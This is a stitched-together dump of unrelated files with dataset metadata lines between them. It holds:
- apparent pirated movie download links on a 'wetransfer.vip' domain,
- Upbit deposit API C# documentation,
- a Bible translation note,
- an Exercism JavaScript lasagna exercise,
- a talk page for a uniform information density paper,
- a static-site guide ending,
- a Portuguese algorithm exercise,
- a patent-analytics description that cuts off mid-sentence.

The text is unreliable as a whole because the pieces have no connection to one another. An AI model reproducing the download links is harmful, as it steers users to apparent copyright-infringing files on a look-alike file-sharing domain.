2](http://b4.wetransfer.vip/files/{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Actor{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Hits{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collection/M.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20G.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Ramachandran{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(M.G.R){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Movies{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collections/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966)/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Sample{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20HD.mp4)_** **_Naadodi Single Part.mp4_** **_Size: 626.8mb_** **_[Download Server 1](http://b4.wetransfer.vip/files/{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Actor{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Hits{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collection/M.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20G.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Ramachandran{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(M.G.R){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Movies{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collections/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966)/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Single{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Part{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20HD.mp4)_** **_[Download Server 2](http://b4.wetransfer.vip/files/{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Actor{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Hits{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collection/M.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20G.{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Ramachandran{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(M.G.R){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Movies{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Collections/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966)/Naadodi{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20(1966){fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Single{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20Part{fb880f6db0ad663db529f57694c28cccd461c3d4fc624305e324329e3cbfaaa8}20HD.mp4)_**
201.565217
1,046
0.929465
yue_Hant
0.098734
bb26b7bcd7893c38c6728b9053dbdaec353abee0
11,294
md
Markdown
swg_generated/csharp/csharp-dotnet2/docs/DepositApi.md
Reclusive-Trader/upbit-client
ca1fb02c9d4e22f6d726baf30a455a235ce0324a
[ "MIT" ]
46
2021-01-07T14:53:26.000Z
2022-03-25T10:11:16.000Z
swg_generated/csharp/csharp-dotnet2/docs/DepositApi.md
Reclusive-Trader/upbit-client
ca1fb02c9d4e22f6d726baf30a455a235ce0324a
[ "MIT" ]
4
2021-02-20T05:21:29.000Z
2022-03-01T12:53:02.000Z
swg_generated/csharp/csharp-dotnet2/docs/DepositApi.md
Reclusive-Trader/upbit-client
ca1fb02c9d4e22f6d726baf30a455a235ce0324a
[ "MIT" ]
59
2021-01-07T11:58:10.000Z
2022-02-15T06:11:33.000Z
# IO.Swagger.Api.DepositApi All URIs are relative to *https://api.upbit.com/v1* Method | HTTP request | Description ------------- | ------------- | ------------- [**DepositCoinAddress**](DepositApi.md#depositcoinaddress) | **GET** /deposits/coin_address | 개별 입금 주소 조회 [**DepositCoinAddresses**](DepositApi.md#depositcoinaddresses) | **GET** /deposits/coin_addresses | 전체 입금 주소 조회 [**DepositGenerateCoinAddress**](DepositApi.md#depositgeneratecoinaddress) | **POST** /deposits/generate_coin_address | 입금 주소 생성 요청 [**DepositInfo**](DepositApi.md#depositinfo) | **GET** /deposit | 개별 입금 조회 [**DepositInfoAll**](DepositApi.md#depositinfoall) | **GET** /deposits | 입금 리스트 조회 <a name="depositcoinaddress"></a> # **DepositCoinAddress** > DepositCompleteResponse DepositCoinAddress (string currency) 개별 입금 주소 조회 ## 개별 입금 주소 조회 **NOTE**: 입금 주소 조회 요청 API 유의사항 입금 주소 생성 요청 이후 아직 발급되지 않은 상태일 경우 deposit_address가 null일 수 있습니다. ### Example ```csharp using System; using System.Diagnostics; using IO.Swagger.Api; using IO.Swagger.Client; using IO.Swagger.Model; namespace Example { public class DepositCoinAddressExample { public void main() { // Configure API key authorization: Bearer Configuration.Default.ApiKey.Add("Authorization", "YOUR_API_KEY"); // Uncomment below to setup prefix (e.g. Bearer) for API key, if needed // Configuration.Default.ApiKeyPrefix.Add("Authorization", "Bearer"); var apiInstance = new DepositApi(); var currency = currency_example; // string | Currency symbol try { // 개별 입금 주소 조회 DepositCompleteResponse result = apiInstance.DepositCoinAddress(currency); Debug.WriteLine(result); } catch (Exception e) { Debug.Print("Exception when calling DepositApi.DepositCoinAddress: " + e.Message ); } } } } ``` ### Parameters Name | Type | Description | Notes ------------- | ------------- | ------------- | ------------- **currency** | **string**| Currency symbol | ### Return type [**DepositCompleteResponse**](DepositCompleteResponse.md) ### Authorization [Bearer](../README.md#Bearer) ### HTTP request headers - **Content-Type**: Not defined - **Accept**: application/json [[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md) <a name="depositcoinaddresses"></a> # **DepositCoinAddresses** > Object DepositCoinAddresses () 전체 입금 주소 조회 ## 내가 보유한 자산 리스트를 보여줍니다. **NOTE**: 입금 주소 조회 요청 API 유의사항 입금 주소 생성 요청 이후 아직 발급되지 않은 상태일 경우 deposit_address가 null일 수 있습니다. ### Example ```csharp using System; using System.Diagnostics; using IO.Swagger.Api; using IO.Swagger.Client; using IO.Swagger.Model; namespace Example { public class DepositCoinAddressesExample { public void main() { // Configure API key authorization: Bearer Configuration.Default.ApiKey.Add("Authorization", "YOUR_API_KEY"); // Uncomment below to setup prefix (e.g. Bearer) for API key, if needed // Configuration.Default.ApiKeyPrefix.Add("Authorization", "Bearer"); var apiInstance = new DepositApi(); try { // 전체 입금 주소 조회 Object result = apiInstance.DepositCoinAddresses(); Debug.WriteLine(result); } catch (Exception e) { Debug.Print("Exception when calling DepositApi.DepositCoinAddresses: " + e.Message ); } } } } ``` ### Parameters This endpoint does not need any parameter. ### Return type **Object** ### Authorization [Bearer](../README.md#Bearer) ### HTTP request headers - **Content-Type**: Not defined - **Accept**: application/json [[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md) <a name="depositgeneratecoinaddress"></a> # **DepositGenerateCoinAddress** > DepositCompleteResponse DepositGenerateCoinAddress (string currency) 입금 주소 생성 요청 입금 주소 생성을 요청한다. **NOTE**: 입금 주소 생성 요청 API 유의사항 입금 주소의 생성은 서버에서 비동기적으로 이뤄집니다. 비동기적 생성 특성상 요청과 동시에 입금 주소가 발급되지 않을 수 있습니다. 주소 발급 요청 시 결과로 Response1이 반환되며 주소 발급 완료 이전까지 계속 Response1이 반환됩니다. 주소가 발급된 이후부터는 새로운 주소가 발급되는 것이 아닌 이전에 발급된 주소가 Response2 형태로 반환됩니다. 정상적으로 주소가 생성되지 않는다면 일정 시간 이후 해당 API를 다시 호출해주시길 부탁드립니다. ### Example ```csharp using System; using System.Diagnostics; using IO.Swagger.Api; using IO.Swagger.Client; using IO.Swagger.Model; namespace Example { public class DepositGenerateCoinAddressExample { public void main() { // Configure API key authorization: Bearer Configuration.Default.ApiKey.Add("Authorization", "YOUR_API_KEY"); // Uncomment below to setup prefix (e.g. Bearer) for API key, if needed // Configuration.Default.ApiKeyPrefix.Add("Authorization", "Bearer"); var apiInstance = new DepositApi(); var currency = currency_example; // string | Currency 코드 try { // 입금 주소 생성 요청 DepositCompleteResponse result = apiInstance.DepositGenerateCoinAddress(currency); Debug.WriteLine(result); } catch (Exception e) { Debug.Print("Exception when calling DepositApi.DepositGenerateCoinAddress: " + e.Message ); } } } } ``` ### Parameters Name | Type | Description | Notes ------------- | ------------- | ------------- | ------------- **currency** | **string**| Currency 코드 | ### Return type [**DepositCompleteResponse**](DepositCompleteResponse.md) ### Authorization [Bearer](../README.md#Bearer) ### HTTP request headers - **Content-Type**: multipart/form-data - **Accept**: application/json [[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md) <a name="depositinfo"></a> # **DepositInfo** > Deposit DepositInfo (string uuid, string txid, string currency) 개별 입금 조회 ## 개별 입금 조회 ### Example ```csharp using System; using System.Diagnostics; using IO.Swagger.Api; using IO.Swagger.Client; using IO.Swagger.Model; namespace Example { public class DepositInfoExample { public void main() { // Configure API key authorization: Bearer Configuration.Default.ApiKey.Add("Authorization", "YOUR_API_KEY"); // Uncomment below to setup prefix (e.g. Bearer) for API key, if needed // Configuration.Default.ApiKeyPrefix.Add("Authorization", "Bearer"); var apiInstance = new DepositApi(); var uuid = uuid_example; // string | 입금 UUID (optional) var txid = txid_example; // string | 입금 TXID (optional) var currency = currency_example; // string | Currency 코드 (optional) try { // 개별 입금 조회 Deposit result = apiInstance.DepositInfo(uuid, txid, currency); Debug.WriteLine(result); } catch (Exception e) { Debug.Print("Exception when calling DepositApi.DepositInfo: " + e.Message ); } } } } ``` ### Parameters Name | Type | Description | Notes ------------- | ------------- | ------------- | ------------- **uuid** | **string**| 입금 UUID | [optional] **txid** | **string**| 입금 TXID | [optional] **currency** | **string**| Currency 코드 | [optional] ### Return type [**Deposit**](Deposit.md) ### Authorization [Bearer](../README.md#Bearer) ### HTTP request headers - **Content-Type**: Not defined - **Accept**: application/json [[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md) <a name="depositinfoall"></a> # **DepositInfoAll** > List<Deposit> DepositInfoAll (string currency, string state, List<string> uuids, List<string> txids, decimal? limit, decimal? page, string orderBy) 입금 리스트 조회 ## 입금 리스트 조회 ### Example ```csharp using System; using System.Diagnostics; using IO.Swagger.Api; using IO.Swagger.Client; using IO.Swagger.Model; namespace Example { public class DepositInfoAllExample { public void main() { // Configure API key authorization: Bearer Configuration.Default.ApiKey.Add("Authorization", "YOUR_API_KEY"); // Uncomment below to setup prefix (e.g. Bearer) for API key, if needed // Configuration.Default.ApiKeyPrefix.Add("Authorization", "Bearer"); var apiInstance = new DepositApi(); var currency = currency_example; // string | Currency 코드 (optional) var state = state_example; // string | 출금 상태 - submitting : 처리 중 - submitted : 처리완료 - almost_accepted : 입금 대기 중 - rejected : 거절 - accepted : 승인됨 - processing : 처리 중 (optional) var uuids = new List<string>(); // List<string> | 입금 UUID의 목록 (optional) var txids = new List<string>(); // List<string> | 입금 TXID의 목록 (optional) var limit = 8.14; // decimal? | 개수 제한 (default: 100, max: 100) (optional) var page = 8.14; // decimal? | 페이지 수, default: 1 (optional) var orderBy = orderBy_example; // string | 정렬 방식 - asc : 오름차순 - desc : 내림차순 (default) (optional) try { // 입금 리스트 조회 List&lt;Deposit&gt; result = apiInstance.DepositInfoAll(currency, state, uuids, txids, limit, page, orderBy); Debug.WriteLine(result); } catch (Exception e) { Debug.Print("Exception when calling DepositApi.DepositInfoAll: " + e.Message ); } } } } ``` ### Parameters Name | Type | Description | Notes ------------- | ------------- | ------------- | ------------- **currency** | **string**| Currency 코드 | [optional] **state** | **string**| 출금 상태 - submitting : 처리 중 - submitted : 처리완료 - almost_accepted : 입금 대기 중 - rejected : 거절 - accepted : 승인됨 - processing : 처리 중 | [optional] **uuids** | [**List<string>**](string.md)| 입금 UUID의 목록 | [optional] **txids** | [**List<string>**](string.md)| 입금 TXID의 목록 | [optional] **limit** | **decimal?**| 개수 제한 (default: 100, max: 100) | [optional] **page** | **decimal?**| 페이지 수, default: 1 | [optional] **orderBy** | **string**| 정렬 방식 - asc : 오름차순 - desc : 내림차순 (default) | [optional] ### Return type [**List<Deposit>**](Deposit.md) ### Authorization [Bearer](../README.md#Bearer) ### HTTP request headers - **Content-Type**: Not defined - **Accept**: application/json [[Back to top]](#) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to Model list]](../README.md#documentation-for-models) [[Back to README]](../README.md)
31.285319
309
0.601735
kor_Hang
0.87361
bb2746e7180e5c48be47a0cfe5478c5c52fa191a
112
md
Markdown
vault/tn/EXO-b459.md
mandolyte/uw-obsidian
39e987c4cdc49d2a68e3af6b4e3fc84d1cda916d
[ "MIT" ]
null
null
null
vault/tn/EXO-b459.md
mandolyte/uw-obsidian
39e987c4cdc49d2a68e3af6b4e3fc84d1cda916d
[ "MIT" ]
null
null
null
vault/tn/EXO-b459.md
mandolyte/uw-obsidian
39e987c4cdc49d2a68e3af6b4e3fc84d1cda916d
[ "MIT" ]
null
null
null
# General Information: Yahweh continues speaking to Moses. Here he tells him what Moses and the people must do.
37.333333
88
0.794643
eng_Latn
0.998556
bb288bffb2cdc994277c14b1dba27bc7d4539afb
5,936
md
Markdown
javascript/lasagna/README.md
paleite/exercism
dba5a18429340432612dc9ffafc21a13765ae989
[ "MIT" ]
null
null
null
javascript/lasagna/README.md
paleite/exercism
dba5a18429340432612dc9ffafc21a13765ae989
[ "MIT" ]
null
null
null
javascript/lasagna/README.md
paleite/exercism
dba5a18429340432612dc9ffafc21a13765ae989
[ "MIT" ]
null
null
null
# Lucian's Luscious Lasagna Welcome to Lucian's Luscious Lasagna on Exercism's JavaScript Track. If you need help running the tests or submitting your code, check out `HELP.md`. If you get stuck on the exercise, check out `HINTS.md`, but try and solve it without using those first :) ## Introduction JavaScript is a dynamic language, supporting object-oriented, imperative, and declarative (e.g. functional programming) styles. ## (Re-)Assignment There are a few primary ways to assign values to names in JavaScript - using variables or constants. On Exercism, variables are always written in [camelCase][wiki-camel-case]; constants are written in [SCREAMING_SNAKE_CASE][wiki-snake-case]. There is no official guide to follow, and various companies and organizations have various style guides. _Feel free to write variables any way you like_. The upside from writing them the way the exercises are prepared is that they'll be highlighted differently in the web interface and most IDEs. Variables in JavaScript can be defined using the [`const`][mdn-const], [`let`][mdn-let] or [`var`][mdn-var] keyword. A variable can reference different values over its lifetime when using `let` or `var`. For example, `myFirstVariable` can be defined and redefined many times using the assignment operator `=`: ```javascript let myFirstVariable = 1 myFirstVariable = "Some string" myFirstVariable = new SomeComplexClass() ``` In contrast to `let` and `var`, variables that are defined with `const` can only be assigned once. This is used to define constants in JavaScript. ```javascript const MY_FIRST_CONSTANT = 10 // Can not be re-assigned. MY_FIRST_CONSTANT = 20 // => TypeError: Assignment to constant variable. ``` > 💡 In a later Concept Exercise the difference between _constant_ assignment / binding and _constant_ value is explored and explained. ## Function Declarations In JavaScript, units of functionality are encapsulated in _functions_, usually grouping functions together in the same file if they belong together. These functions can take parameters (arguments), and can _return_ a value using the `return` keyword. Functions are invoked using `()` syntax. ```javascript function add(num1, num2) { return num1 + num2 } add(1, 3) // => 4 ``` > 💡 In JavaScript there are _many_ different ways to declare a function. These other ways look different than using the `function` keyword. The track tries to gradually introduce them, but if you already know about them, feel free to use any of them. In most cases, using one or the other isn't better or worse. ## Exposing to Other Files To make a `function`, a constant, or a variable available in _other files_, they need to be [exported][mdn-export] using the `export` keyword. Another file may then [import][mdn-import] these using the `import` keyword. This is also known as the module system. A great example is how all the tests work. Each exercise has at least one file, for example `lasagna.js`, which contains the _implementation_. Additionally there is at least one other file, for example `lasagna.spec.js`, that contains the _tests_. This file _imports_ the public (i.e. exported) entities in order to test the implementation: ```javascript // file.js export const MY_VALUE = 10 export function add(num1, num2) { return num1 + num2 } // file.spec.js import { MY_VALUE, add } from "./file" add(MY_VALUE, 5) // => 15 ``` [mdn-const]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/const [mdn-export]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/export [mdn-import]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import [mdn-let]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/let [mdn-var]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/var [wiki-camel-case]: https://en.wikipedia.org/wiki/Camel_case [wiki-snake-case]: https://en.wikipedia.org/wiki/Snake_case ## Instructions Lucian's girlfriend is on her way home, and he hasn't cooked their anniversary dinner! In this exercise, you're going to write some code to help Lucian cook an exquisite lasagna from his favorite cookbook. You have four tasks related to the time spent cooking the lasagna. ## 1. Define the expected oven time in minutes Define the `EXPECTED_MINUTES_IN_OVEN` constant that represents how many minutes the lasagna should be in the oven. It must be exported. According to the cooking book, the expected oven time in minutes is `40`. ## 2. Calculate the remaining oven time in minutes Implement the `remainingMinutesInOven` function that takes the actual minutes the lasagna has been in the oven as a _parameter_ and _returns_ how many minutes the lasagna still has to remain in the oven, based on the **expected oven time in minutes** from the previous task. ```javascript remainingMinutesInOven(30) // => 10 ``` ## 3. Calculate the preparation time in minutes Implement the `preparationTimeInMinutes` function that takes the number of layers you added to the lasagna as a _parameter_ and _returns_ how many minutes you spent preparing the lasagna, assuming each layer takes you 2 minutes to prepare. ```javascript preparationTimeInMinutes(2) // => 4 ``` ## 4. Calculate the total working time in minutes Implement the `totalTimeInMinutes` function that takes _two parameters_: the `numberOfLayers` parameter is the number of layers you added to the lasagna, and the `actualMinutesInOven` parameter is the number of minutes the lasagna has been in the oven. The function should _return_ how many minutes in total you've worked on cooking the lasagna, which is the sum of the preparation time in minutes, and the time in minutes the lasagna has spent in the oven at the moment. ```javascript totalTimeInMinutes(3, 20) // => 26 ``` ## Source ### Created by - @SleeplessByte ### Contributed to by - @junedev
46.740157
601
0.771732
eng_Latn
0.995284
bb28b14d368b57c882e3a1eb37312cfe82c887b1
2,157
md
Markdown
content/talk/meisteral-emnlp-21-a/index.md
rycolab/website
342d8e33b3e8b3ce4c52fdc8ec2c731b369fbbe4
[ "MIT" ]
null
null
null
content/talk/meisteral-emnlp-21-a/index.md
rycolab/website
342d8e33b3e8b3ce4c52fdc8ec2c731b369fbbe4
[ "MIT" ]
null
null
null
content/talk/meisteral-emnlp-21-a/index.md
rycolab/website
342d8e33b3e8b3ce4c52fdc8ec2c731b369fbbe4
[ "MIT" ]
3
2020-06-12T20:18:03.000Z
2021-01-14T17:44:52.000Z
--- title: "Revisiting the Uniform Information Density Hypothesis" date: 2021-11-01 publishDate: 2021-10-08T07:56:33.149254Z authors: ["Clara Meister", "Tiago Pimentel", "Patrick Haller", "Lena Jäger", "Ryan Cotterell", "Roger Levy"] publication_types: ["1"] abstract: "The uniform information density (UID) hypothesis posits a preference among language users for utterances structured such that information is distributed uniformly across a signal. While its implications on language production have been well explored, the hypothesis potentially makes predictions about language comprehension and linguistic acceptability as well. Further, it is unclear how uniformity in a linguistic signal -- or lack thereof -- should be measured, and over which linguistic unit, e.g., the sentence or language level, this uniformity should hold. Here we investigate these facets of the UID hypothesis using reading time and acceptability data. While our reading time results are generally consistent with previous work, they are also consistent with a weakly super-linear effect of surprisal, which would be compatible with UID's predictions. For acceptability judgments, we find clearer evidence that non-uniformity in information density is predictive of lower acceptability. We then explore multiple operationalizations of UID, motivated by different interpretations of the original hypothesis, and analyze the scope over which the pressure towards uniformity is exerted. The explanatory power of a subset of the proposed operationalizations suggests that the strongest trend may be a regression towards a mean surprisal across the language, rather than the phrase, sentence, or document -- a finding that supports a typical interpretation of UID, namely that it is the byproduct of language users maximizing the use of a (hypothetical) communication channel." featured: true publication: "*Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing*" publication_short: "EMNLP" links: - name: arXiv url: https://arxiv.org/abs/2109.11635 url_pdf: papers/meister+al.emnlp21a.pdf url_code: https://github.com/rycolab/revisiting-uid ---
119.833333
1,593
0.812703
eng_Latn
0.996207
bb298c65cf9a80cc6d61fb746d243c49ec3fb600
626
md
Markdown
content/static-sites/s3-terraform/conclusion.md
blackieops/deployawebsite
4ec6f113599004de5e8303b9bd74b3a10d131e0e
[ "BSD-3-Clause" ]
null
null
null
content/static-sites/s3-terraform/conclusion.md
blackieops/deployawebsite
4ec6f113599004de5e8303b9bd74b3a10d131e0e
[ "BSD-3-Clause" ]
1
2020-03-04T02:54:04.000Z
2020-03-04T02:54:04.000Z
content/static-sites/s3-terraform/conclusion.md
blackieops/deployawebsite
4ec6f113599004de5e8303b9bd74b3a10d131e0e
[ "BSD-3-Clause" ]
null
null
null
--- title: to S3 and CloudFront with Terraform article_section: Wrap-up previous_link: /static-sites/s3-terraform/workspaces/ previous_text: Making it Generic --- You've reached the end. At this point, you should have a directory of Terraform suitable for reuse to deploy all the static sites you could desire. The resulting final result of this guide [are available][1] for those who wish to check their work, or cheat. --- If you found a typo or problem in any of this guide, please contribute a patch; contributions and fixes are always welcome! [1]: https://github.com/blackieops/deployawebsite-example-s3-terraform/
31.3
79
0.779553
eng_Latn
0.99623
bb29b26851fd819068c26282ffee318a76d20b89
384
md
Markdown
exercicios01/17/README.md
lucianobragaweb/algoritmos-logica-programacao
7126f8401b02c8035b41252fb094f1e8c71221dd
[ "MIT" ]
null
null
null
exercicios01/17/README.md
lucianobragaweb/algoritmos-logica-programacao
7126f8401b02c8035b41252fb094f1e8c71221dd
[ "MIT" ]
null
null
null
exercicios01/17/README.md
lucianobragaweb/algoritmos-logica-programacao
7126f8401b02c8035b41252fb094f1e8c71221dd
[ "MIT" ]
null
null
null
# 17 - Construa um algoritmo que dado os lados de um retângulo calcule seu perímetro e depois sua área. No final escreve os lados, seu perímetro e sua área. **Entradas** lado1, lado2, lado3, lado4, base, altura: real; **Saídas** calculo perimetro e area perimetro := lado1 + lado2 + lado3 + lado4; area := base * altura; escrever os lados escrever perimetro e area
22.588235
156
0.705729
por_Latn
0.995868
bb2a290ee4556e8e34c39d354bd8be0b23221201
75,610
markdown
Markdown
_posts/2009-11-10-patent-analytics-system.markdown
LizetteO/Tracking.virtually.unlimited.number.tokens.and.addresses
89c6b0fa3defa14758d6794027cc15150d005bbd
[ "Apache-2.0" ]
null
null
null
_posts/2009-11-10-patent-analytics-system.markdown
LizetteO/Tracking.virtually.unlimited.number.tokens.and.addresses
89c6b0fa3defa14758d6794027cc15150d005bbd
[ "Apache-2.0" ]
null
null
null
_posts/2009-11-10-patent-analytics-system.markdown
LizetteO/Tracking.virtually.unlimited.number.tokens.and.addresses
89c6b0fa3defa14758d6794027cc15150d005bbd
[ "Apache-2.0" ]
2
2019-10-31T13:03:55.000Z
2020-08-13T12:57:08.000Z
--- title: Patent analytics system abstract: In an example embodiment, there is a method of maintaining a database of patent claim entries. The patent claim entries are associated with one or more patent documents as well as one or more parameters characterizing a patent claim. The database may be accessed to retrieve a selection of one or more patent claim entries. This may be accomplished by retrieving the one or more parameters associated with the selection of the one or more patent claim entries. Additionally, one or more of the parameters characterizing a patent claims may be selected. A report chart is presented on a display device. The report chart depicts relationships between the selected parameters and the one or more patent claim entries retrieved from the database. The relationships are depicted as a plurality of data points. Also a visualization option may be selected and the report chart may be modified based on the selection. The visualization options may include highlighting related data points, presenting claim language associated with a data point, and presenting more parameters associated with the data point. url: http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&Sect2=HITOFF&p=1&u=%2Fnetahtml%2FPTO%2Fsearch-adv.htm&r=1&f=G&l=50&d=PALL&S1=09336304&OS=09336304&RS=09336304 owner: number: 09336304 owner_city: owner_country: publication_date: 20091110 --- This patent application claims the benefit of priority under 35 U.S.C. Section 119 e to U.S. Provisional Patent Application Ser. No. 61 113 114 entitled PATENT DATABASE AND ANALYTICS ENGINE filed on Nov. 10 2008 which is hereby incorporated by reference. This patent application also claims priority under 35 U.S.C. Section 119 e to U.S. Provisional Patent Application Ser. No. 61 115 284 entitled PATENT CLAIM REFERENCE GENERATION filed on Nov. 17 2008 which is hereby incorporated by reference. This patent document relates generally to patent claim information as implemented in software and more specifically but not by way of limitation to a patent claim reference and analytics system. The value of a patent and the technology disclosed therein to some extent hinges on the ability to identify patents printed publications and other data within the same technology space as the patented technology. Once identified the relative strength of the patent and its claims may be determined. The following detailed description includes references to the accompanying drawings which form a part of the detailed description. The drawings show by way of illustration specific embodiments in which the invention may be practiced. These embodiments which are also referred to herein as examples are illustrated in enough detail to enable those skilled in the art to practice the invention. The embodiments may be combined other embodiments may be utilized or structural logical and electrical changes may be made without departing from the scope of the present invention. The following detailed description is therefore not to be taken in a limiting sense and the scope of the present invention is defined by the appended claims and their equivalents. In this document the terms a or an are used as is common in patent documents to include one or more than one. In this document the term or is used to refer to a nonexclusive or unless otherwise indicated. Furthermore all publications patents and patent documents referred to in this document are incorporated by reference herein in their entirety as though individually incorporated by reference. In the event of inconsistent usages between this document and those documents so incorporated by reference the usage in the incorporated reference s should be considered supplementary to that of this document for irreconcilable inconsistencies the usage in this document controls. Various embodiments illustrated herein provide computerized patent analytics systems methods data structures and encoded instructions. Some such embodiments provide methods of storing patent reference data subjective patent data methods of presenting patent reference data methods of presenting subjective patent data and method of presenting a combination of the subjective and reference data. Pharmaceutical companies like many companies need to make determinations of where best to spend their resources. In particular there is particular value in being the first company to genericize a commercial drug as there exists a 180 day period of exclusivity for the first company to file under the Abbreviated New Drug Application ANDA process. The process for filing for filing an ANDA may involve the financial technical regulatory and legal departments of a company. The business department may need to identify those drugs that represent significant revenue potential e.g. those that satisfy suitable sales and market share . The technical department may possess the technical capabilities to develop the generic drug including the Active Pharmaceutical Ingredient API . The regulatory department may need to demonstrate bioequivalence. Finally the legal department may need to show non infringement or invalidity of existing patents. There may be many challenges and obstacles that need to be overcome in order to successively bring a generic drug to market. For example the business development group BDG may to need to consider past and future sales and past and future market share to determine if it is financially worthwhile to move into a particular market. The BDG may also wish to know which drugs have been already genericized and the sales of those drugs. For example it may still be useful to genericize a commercial drug if there is a low number of a generic drugs relative to the total market share for the commercial drug. The legal department may need to decide whether to certify under paragraph III or paragraph IV. Also the breadth of patent protection may vary depending on the patent specification and claims of the patent. Subjective determinations of a patent may be made to determine the value of the patent to a given company. For example an analysis of a patent may include determining whether each patent claim is broad narrow or somewhere in between. This information may help to determine whether or not the breadth of patent protection makes it feasible to genericize a particular drug. Other important information may include when relevant patents expire as well as the Food and Drug Administration FDA periods of exclusivity. In some instances a company may seek an opinion letter from a law firm to determine non infringement or invalidity positions. However opinions may expensive and time consuming to obtain. The legal department may also be used to conduct a freedom to operate FTO clearance review for non Orange Book e.g. process or third party patents. In an example embodiment methods and systems are developed to help streamline the ANDA process. The systems and methods may also be used in other aspects of business or patent analysis as one skilled in the art will appreciate. In an example embodiment a web based solution is developed to help senior management business development personnel financial personnel in house counsel opinion counsel litigation counsel and licensing and transactional counsel with the ANDA process. In an example embodiment there are three main components used to facilitate this process database creation through the gathering of patent and drug reference information analytics and report chart generation based on merging information in the database with the applied analytics. Each main component may include one or more additional components as described below. In an example embodiment at a high level the database creation component may include an automated process of gathering objective patent reference information into a database that may include but is not limited to claim language patent expiration data intrinsic evidence and extrinsic evidence associated with the patent. It may further include gathering information from regulatory legal technical and financial sources including but not limited to the Orange Book United States Patent and Trademark Office USPTO Orange Book patents Drug Information and SEC filings. A user of the resulting database may search and filter results to quickly find information related to any number of drugs and see patents associated with the drug. Reports may be generated from the database that take the raw data and present it in a form that non legal and non technical personnel can utilize. For example business personnel may inquire as to the number of patents related to drug X and the expiration dates of the patents. As the database may be constantly updated in real time the report may also include the most up to date information. In an example embodiment the analytics component may include ranking and rating patent claims by applying subjective criteria to the gathered patents. The subjective criteria may include but is not limited to if a claim is listable in the Orange Book the breadth of claims in patents whether or not a claim covers a commercial product the type of claim and claim category. Determining whether or not a drug is listable in Orange Book may include information relating to off label use metabolite pro drug processing claims key synthetic intermediates etc. The claim breadth or scope may be based on criteria such ease of design around ability and anticipated validity. There may also be a subjective analysis of a patent claim to determine whether a claim has been drafted narrowly or broadly. Claim types may include but are not limited to compound method of use polymorph hydrate and method of medical use. Claim categories may include but are not limited to core ancillary and evergreen. In an example embodiment a legend or key is provided that defines each term used in the subjective criteria as well as why a patent was given a particular rating. In an example embodiment once the database has been populated with reference information and the claims have been analyzed using the various subjective criteria charts may be generated by using one or both of the resulting data sets. This may be done by displaying objective data from the database against subjective criteria from the analytics component together on a chart. For example a user of the system may 